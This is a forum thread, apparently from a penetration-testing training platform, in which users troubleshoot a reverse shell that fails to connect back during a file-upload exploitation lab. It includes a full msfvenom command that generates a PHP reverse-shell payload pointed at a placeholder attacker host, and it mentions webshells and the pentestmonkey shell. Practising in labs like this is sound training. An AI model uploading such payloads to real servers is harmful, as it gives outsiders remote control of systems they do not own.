File Upload Attacks - Upload Exploitation

Hello all. I’m trying to get my reverse shell running but it seems like it won’t connect. I’m connected to the VPN and used the following command to generate it:
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Uploaded it over the website and opened it. It also seems like it tries to connect but I won’t receive the connection.
That the output I receive after it finished loading:
/*

Edit: I wonder why I get IP adresses like “http://167.71.143.119:30883/

is this even the same network as the VPN? Seems like another network. That would explain why it won’t connect.

From your above post. I think you haven’t set your lisener up. Set up your listener and try it.

I did and it didnt work. Does it work for you? Like i said it seems like those are different networks.

1 Like

What’s your tun0 interface ip. Does the IP of the machine and your tun0 match. If not you have some problems with the connection.

Have you checked your firewall settings @Newuser ?

I’ve been experiencing this same issue. Has anyone resolved it?

1 Like

I have the same experience, I am confused. The webshell worked and I got the flag immediately, and then I started doing reverse shell for reps, and I could not recieve the shell using the pentest monkey, I check the vpn, got a new connection file, yes I checked the firewall, yes I check the listener. The thing is I do this all the time with pentestmonkey etc. I get no reverse shells. I dont know what that is about.